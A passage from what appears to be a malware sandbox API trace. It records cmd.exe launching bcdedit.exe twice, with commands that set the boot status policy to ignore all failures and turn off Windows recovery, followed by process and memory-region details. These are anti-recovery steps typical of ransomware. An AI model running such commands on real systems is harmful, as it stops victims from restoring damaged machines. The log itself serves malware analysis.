_String2="COPY") returned -1 [0150.286] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0150.286] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0150.286] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0150.286] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0150.286] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0150.286] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0150.286] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0150.286] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0150.286] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0150.286] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0150.286] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0150.286] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0150.286] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0150.286] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0150.287] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0150.287] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0150.287] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0150.287] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0150.287] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0150.287] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0150.287] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0150.287] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0150.287] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0150.287] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0150.287] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0150.287] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0150.287] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0150.287] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0150.287] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0150.287] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0150.287] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0150.287] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0150.287] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0150.287] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0150.287] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0150.287] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0150.287] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0150.287] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0150.287] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0150.287] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0150.288] GetProcessHeap () returned 0x480000 [0150.288] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x218) returned 0x49a1a0 [0150.288] GetProcessHeap () returned 0x480000 [0150.288] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x88) returned 0x481320 [0150.288] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0150.288] GetProcessHeap () returned 0x480000 [0150.288] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x420) returned 0x4813b0 [0150.288] SetErrorMode (uMode=0x0) returned 0x0 [0150.288] SetErrorMode (uMode=0x1) returned 0x0 [0150.288] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4813c0, lpFilePart=0x2fec50 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x2fec50*="Roaming") returned 0x22 [0150.289] SetErrorMode (uMode=0x0) returned 0x1 [0150.289] GetProcessHeap () returned 0x480000 [0150.289] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x4813b0, Size=0x66) returned 0x4813b0 [0150.289] GetProcessHeap () returned 0x480000 [0150.289] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4813b0) returned 0x66 [0150.289] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aaff360, nSize=0x2000 | out: lpBuffer="") returned 0xc8 [0150.289] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.289] GetProcessHeap () returned 0x480000 [0150.289] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1ec) returned 0x481430 [0150.289] GetProcessHeap () returned 0x480000 [0150.289] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c8) returned 0x481630 [0150.300] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x481630, Size=0x1ee) returned 0x481630 [0150.300] GetProcessHeap () returned 0x480000 [0150.300] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x481630) returned 0x1ee [0150.300] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aaff360, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0150.300] GetProcessHeap () returned 0x480000 [0150.300] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xe8) returned 0x481830 [0150.300] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x481830, Size=0x7e) returned 0x481830 [0150.300] GetProcessHeap () returned 0x480000 [0150.300] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x481830) returned 0x7e [0150.301] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.301] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bcdedit.*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bcdedit.*"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.302] GetLastError () returned 0x2 [0150.302] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bcdedit" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bcdedit"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.302] GetLastError () returned 0x2 [0150.302] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.302] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\bcdedit.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\bcdedit.*"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.303] GetLastError () returned 0x2 [0150.303] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\bcdedit" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\bcdedit"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.303] GetLastError () returned 0x2 [0150.303] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.303] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*" (normalized: "c:\\windows\\system32\\bcdedit.*"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0x4818c0 [0150.303] GetProcessHeap () returned 0x480000 [0150.303] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x28) returned 0x4947e0 [0150.303] FindClose (in: hFindFile=0x4818c0 | out: hFindFile=0x4818c0) returned 1 [0150.304] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM" (normalized: "c:\\windows\\system32\\bcdedit.com"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.304] GetLastError () returned 0x2 [0150.304] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE" (normalized: "c:\\windows\\system32\\bcdedit.exe"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0x4818c0 [0150.304] GetProcessHeap () returned 0x480000 [0150.304] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x4947e0, Size=0x8) returned 0x49a3c0 [0150.304] FindClose (in: hFindFile=0x4818c0 | out: hFindFile=0x4818c0) returned 1 [0150.304] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.304] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.304] GetConsoleTitleW (in: lpConsoleTitle=0x2fef10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.304] InitializeProcThreadAttributeList (in: lpAttributeList=0x2fecc8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2fec88 | out: lpAttributeList=0x2fecc8, lpSize=0x2fec88) returned 1 [0150.304] UpdateProcThreadAttribute (in: lpAttributeList=0x2fecc8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2fec78, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2fecc8, lpPreviousValue=0x0) returned 1 [0150.304] GetStartupInfoW (in: lpStartupInfo=0x2fede0 | out: lpStartupInfo=0x2fede0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0150.305] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.307] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpStartupInfo=0x2fed00*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fecb0 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures ", lpProcessInformation=0x2fecb0*(hProcess=0x58, hThread=0x54, dwProcessId=0xd44, dwThreadId=0xce4)) returned 1 [0150.320] CloseHandle (hObject=0x54) returned 1 [0150.320] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.320] GetProcessHeap () returned 0x480000 [0150.320] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49bb00 | out: hHeap=0x480000) returned 1 [0150.320] GetEnvironmentStringsW () returned 0x49af50* [0150.320] GetProcessHeap () returned 0x480000 [0150.320] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xb9a) returned 0x49bb00 [0150.320] memcpy (in: _Dst=0x49bb00, _Src=0x49af50, _Size=0xb9a | out: _Dst=0x49bb00) returned 0x49bb00 [0150.320] FreeEnvironmentStringsW (penv=0x49af50) returned 1 [0150.320] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0150.403] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x2febf8 | out: lpExitCode=0x2febf8*=0x0) returned 1 [0150.403] CloseHandle (hObject=0x58) returned 1 [0150.403] _vsnwprintf (in: _Buffer=0x2fee68, _BufferCount=0x13, _Format="%08X", _ArgList=0x2fec08 | out: _Buffer="00000000") returned 8 [0150.403] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.403] GetProcessHeap () returned 0x480000 [0150.403] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49bb00 | out: hHeap=0x480000) returned 1 [0150.403] GetEnvironmentStringsW () returned 0x49af50* [0150.403] GetProcessHeap () returned 0x480000 [0150.403] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xbc0) returned 0x49d280 [0150.403] memcpy (in: _Dst=0x49d280, _Src=0x49af50, _Size=0xbc0 | out: _Dst=0x49d280) returned 0x49d280 [0150.403] FreeEnvironmentStringsW (penv=0x49af50) returned 1 [0150.403] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.403] GetProcessHeap () returned 0x480000 [0150.403] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49d280 | out: hHeap=0x480000) returned 1 [0150.403] GetEnvironmentStringsW () returned 0x49af50* [0150.403] GetProcessHeap () returned 0x480000 [0150.403] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xbc0) returned 0x49d280 [0150.404] memcpy (in: _Dst=0x49d280, _Src=0x49af50, _Size=0xbc0 | out: _Dst=0x49d280) returned 0x49d280 [0150.404] FreeEnvironmentStringsW (penv=0x49af50) returned 1 [0150.404] GetProcessHeap () returned 0x480000 [0150.404] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49a3e0 | out: hHeap=0x480000) returned 1 [0150.404] DeleteProcThreadAttributeList (in: lpAttributeList=0x2fecc8 | out: lpAttributeList=0x2fecc8) [0150.404] GetConsoleTitleW (in: lpConsoleTitle=0x2ff3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.404] SetErrorMode (uMode=0x0) returned 0x0 [0150.404] SetErrorMode (uMode=0x1) returned 0x0 [0150.404] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x498fc0, lpFilePart=0x2fec50 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x2fec50*="Roaming") returned 0x22 [0150.404] SetErrorMode (uMode=0x0) returned 0x1 [0150.404] GetProcessHeap () returned 0x480000 [0150.405] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x498fb0, Size=0x66) returned 0x498fb0 [0150.405] GetProcessHeap () returned 0x480000 [0150.405] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x498fb0) returned 0x66 [0150.405] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aaff360, nSize=0x2000 | out: lpBuffer="") returned 0xc8 [0150.405] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.405] GetProcessHeap () returned 0x480000 [0150.405] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1ec) returned 0x499030 [0150.405] GetProcessHeap () returned 0x480000 [0150.405] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c8) returned 0x499230 [0150.406] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x499230, Size=0x1ee) returned 0x499230 [0150.406] GetProcessHeap () returned 0x480000 [0150.406] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x499230) returned 0x1ee [0150.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aaff360, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0150.406] GetProcessHeap () returned 0x480000 [0150.406] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xe8) returned 0x481d10 [0150.406] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x481d10, Size=0x7e) returned 0x481d10 [0150.406] GetProcessHeap () returned 0x480000 [0150.406] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x481d10) returned 0x7e [0150.406] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.406] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bcdedit.*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bcdedit.*"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.407] GetLastError () returned 0x2 [0150.407] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bcdedit" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bcdedit"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.407] GetLastError () returned 0x2 [0150.407] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.407] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\bcdedit.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\bcdedit.*"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.407] GetLastError () returned 0x2 [0150.408] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\bcdedit" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\bcdedit"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.408] GetLastError () returned 0x2 [0150.408] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*" (normalized: "c:\\windows\\system32\\bcdedit.*"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0x481da0 [0150.408] FindClose (in: hFindFile=0x481da0 | out: hFindFile=0x481da0) returned 1 [0150.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM" (normalized: "c:\\windows\\system32\\bcdedit.com"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0xffffffffffffffff [0150.409] GetLastError () returned 0x2 [0150.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE" (normalized: "c:\\windows\\system32\\bcdedit.exe"), fInfoLevelId=0x1, lpFindFileData=0x2fe9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2fe9c0) returned 0x481da0 [0150.409] FindClose (in: hFindFile=0x481da0 | out: hFindFile=0x481da0) returned 1 [0150.409] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.409] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.409] GetConsoleTitleW (in: lpConsoleTitle=0x2fef10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.409] InitializeProcThreadAttributeList (in: lpAttributeList=0x2fecc8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2fec88 | out: lpAttributeList=0x2fecc8, lpSize=0x2fec88) returned 1 [0150.409] UpdateProcThreadAttribute (in: lpAttributeList=0x2fecc8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2fec78, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2fecc8, lpPreviousValue=0x0) returned 1 [0150.409] GetStartupInfoW (in: lpStartupInfo=0x2fede0 | out: lpStartupInfo=0x2fede0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0150.410] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.410] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpStartupInfo=0x2fed00*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fecb0 | out: lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x2fecb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xce0, dwThreadId=0xd68)) returned 1 [0150.414] CloseHandle (hObject=0x58) returned 1 [0150.414] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.414] GetProcessHeap () returned 0x480000 [0150.414] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49d280 | out: hHeap=0x480000) returned 1 [0150.414] GetEnvironmentStringsW () returned 0x49af50* [0150.414] GetProcessHeap () returned 0x480000 [0150.414] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xbc0) returned 0x49d280 [0150.414] memcpy (in: _Dst=0x49d280, _Src=0x49af50, _Size=0xbc0 | out: _Dst=0x49d280) returned 0x49d280 [0150.414] FreeEnvironmentStringsW (penv=0x49af50) returned 1 [0150.414] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0150.489] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2febf8 | out: lpExitCode=0x2febf8*=0x0) returned 1 [0150.489] CloseHandle (hObject=0x54) returned 1 [0150.489] _vsnwprintf (in: _Buffer=0x2fee68, _BufferCount=0x13, _Format="%08X", _ArgList=0x2fec08 | out: _Buffer="00000000") returned 8 [0150.489] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.489] GetProcessHeap () returned 0x480000 [0150.489] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49d280 | out: hHeap=0x480000) returned 1 [0150.489] GetEnvironmentStringsW () returned 0x49af50* [0150.489] GetProcessHeap () returned 0x480000 [0150.489] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xbc0) returned 0x49d280 [0150.489] memcpy (in: _Dst=0x49d280, _Src=0x49af50, _Size=0xbc0 | out: _Dst=0x49d280) returned 0x49d280 [0150.489] FreeEnvironmentStringsW (penv=0x49af50) returned 1 [0150.489] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.489] GetProcessHeap () returned 0x480000 [0150.489] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49d280 | out: hHeap=0x480000) returned 1 [0150.489] GetEnvironmentStringsW () returned 0x49af50* [0150.489] GetProcessHeap () returned 0x480000 [0150.490] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xbc0) returned 0x49d280 [0150.490] memcpy (in: _Dst=0x49d280, _Src=0x49af50, _Size=0xbc0 | out: _Dst=0x49d280) returned 0x49d280 [0150.490] FreeEnvironmentStringsW (penv=0x49af50) returned 1 [0150.490] GetProcessHeap () returned 0x480000 [0150.490] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4960c0 | out: hHeap=0x480000) returned 1 [0150.490] DeleteProcThreadAttributeList (in: lpAttributeList=0x2fecc8 | out: lpAttributeList=0x2fecc8) [0150.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aafe194 | out: lpMode=0x4aafe194) returned 1 [0150.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aafe198 | out: lpMode=0x4aafe198) returned 1 [0150.491] SetConsoleInputExeNameW () returned 0x1 [0150.491] GetConsoleOutputCP () returned 0x1b5 [0150.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab0bfe0 | out: lpCPInfo=0x4ab0bfe0) returned 1 [0150.491] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0150.491] exit (_Code=0) Process: id = "12" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x32c5c000" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xd48" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2018 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2019 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2020 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2021 start_va = 0x80000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2022 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2023 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2024 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2025 start_va = 0xffb20000 end_va = 0xffb76fff monitored = 0 entry_point = 0xffb496b8 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 2026 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2027 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2028 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2029 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2030 start_va = 0x100000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2031 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = 